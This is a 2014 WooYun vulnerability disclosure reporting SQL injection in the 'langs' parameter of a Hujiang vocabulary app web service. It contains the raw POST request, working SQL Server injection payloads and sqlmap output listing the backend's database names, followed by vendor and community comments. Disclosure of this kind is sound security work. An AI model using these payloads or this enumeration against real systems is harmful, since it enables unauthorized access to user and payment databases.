当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082418

漏洞标题:沪江英语某分站存在sql注入漏洞

相关厂商:hujiang.com

漏洞作者: 路人甲

提交时间:2014-11-10 11:37

修复时间:2014-11-15 11:38

公开时间:2014-11-15 11:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

沪江词场app某借口存在注入

详细说明:

POST /services/mobileservice2.asmx/GetLearningBooks HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Host: cichang.hujiang.com
Connection: Keep-Alive
User-Agent: android-async-http/1.4.1 (http://loopj.com/android-async-http)
Accept-Encoding: gzip
langs=&userid=29372243


langs存在注入
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 18:45:52
[18:45:52] [INFO] parsing HTTP request from '1.txt'
[18:45:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[18:45:53] [INFO] testing connection to the target url
[18:46:14] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
[18:46:14] [WARNING] if the problem persists please check that the provided targ
et url is valid. In case that it is, you can try to rerun with the switch '--ran
dom-agent' turned on and/or proxy switches (--ignore-proxy, --proxy,...)
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: langs
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: langs=' AND 2677=CONVERT(INT,(CHAR(58)+CHAR(103)+CHAR(117)+CHAR(106
)+CHAR(58)+(SELECT (CASE WHEN (2677=2677) THEN CHAR(49) ELSE CHAR(48) END))+CHAR
(58)+CHAR(107)+CHAR(110)+CHAR(114)+CHAR(58))) AND 'OGab'='OGab&userid=29372243
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: langs='; WAITFOR DELAY '0:0:5'--&userid=29372243
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: langs=' WAITFOR DELAY '0:0:5'--&userid=29372243
---
[18:46:15] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[18:46:15] [INFO] fetching database names
[18:46:36] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
[18:46:38] [INFO] the SQL query used returns 22 entries
[18:46:56] [INFO] fetching number of databases
[18:46:56] [INFO] retrieved:
[18:46:56] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[18:47:07] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[18:47:07] [ERROR] unable to retrieve the number of databases
[18:47:08] [INFO] retrieved: HJ_CiChang
[18:47:08] [INFO] retrieved: master
[18:47:09] [INFO] retrieved: tempdb
[18:47:09] [INFO] retrieved: model
[18:47:10] [INFO] retrieved: msdb
[18:47:11] [INFO] retrieved: HJ_YuLiao_Ti
[18:47:12] [INFO] retrieved: HJ_Cognos
[18:47:13] [INFO] retrieved: HJ_ClassAnaly
[18:47:14] [INFO] retrieved: HJ_ClassApp
[18:47:15] [INFO] retrieved: HJ_Yuliao
[18:47:15] [INFO] retrieved: HJ_CiChang
[18:47:16] [INFO] retrieved: HJ_Exam
[18:47:20] [INFO] retrieved: HJ_A6
[18:47:21] [INFO] retrieved: HJ_A6Report
[18:47:22] [INFO] retrieved: HJ_Pay
[18:47:22] [INFO] retrieved: DBCenter
[18:47:23] [INFO] retrieved: HJ_Analysis
[18:47:23] [INFO] retrieved: HJ_WordTest
[18:47:24] [INFO] retrieved: HJ_History
[18:47:24] [INFO] retrieved: HJ_HuTi
[18:47:24] [INFO] retrieved: HJ_WordTest2
[18:47:24] [INFO] retrieved: HJ_CiChangBI
[18:47:25] [INFO] retrieved: distribution
[18:47:25] [INFO] retrieved:
available databases [23]:
[*] DBCenter
[*] distribution
[*] HJ_A6
[*] HJ_A6Report
[*] HJ_Analysis
[*] HJ_CiChang
[*] HJ_CiChangBI
[*] HJ_ClassAnaly
[*] HJ_ClassApp
[*] HJ_Cognos
[*] HJ_Exam
[*] HJ_History
[*] HJ_HuTi
[*] HJ_Pay
[*] HJ_WordTest
[*] HJ_WordTest2
[*] HJ_Yuliao
[*] HJ_YuLiao_Ti
[*] master
[*] model
[*] msdb
[*] tempdb
[18:47:25] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 25 times
[18:47:25] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\cichang.hujiang.com'
[*] shutting down at 18:47:25
库还是比较多的,能力有限,到此为止

漏洞证明:

[*] DBCenter
[*] distribution
[*] HJ_A6
[*] HJ_A6Report
[*] HJ_Analysis
[*] HJ_CiChang
[*] HJ_CiChangBI
[*] HJ_ClassAnaly
[*] HJ_ClassApp
[*] HJ_Cognos
[*] HJ_Exam
[*] HJ_History
[*] HJ_HuTi
[*] HJ_Pay
[*] HJ_WordTest
[*] HJ_WordTest2
[*] HJ_Yuliao
[*] HJ_YuLiao_Ti
[*] master
[*] model
[*] msdb
[*] tempdb

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-15 11:38

厂商回复:

最新状态:

2014-11-24:都是我的错...都怪我没及时确认...老板已经在厕所里严肃地批评我了(地点似乎有些怪怪的?)……为了表达我们的谢意,送上礼物一份,还请白帽同学笑纳。


漏洞评价:

评论

  1. 2014-11-15 12:37 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    @沪江英语 ,没有影响?

  2. 2014-11-24 13:11 | 上海互加文化传播有限公司(乌云厂商)

    @默之 有影响……我已经在上面认错了,求轻拍……正与乌云联系白帽子以寄送小礼物一份。

  3. 2014-11-24 13:12 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    @上海互加文化传播有限公司 私信你了已经,还没得到过礼物,想想都很开心

  4. 2014-11-24 13:15 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    @上海互加文化传播有限公司 另外,这个子站是不是存在内部接口调用?http://cichang.hujiang.com/services/mobileservice2.asmx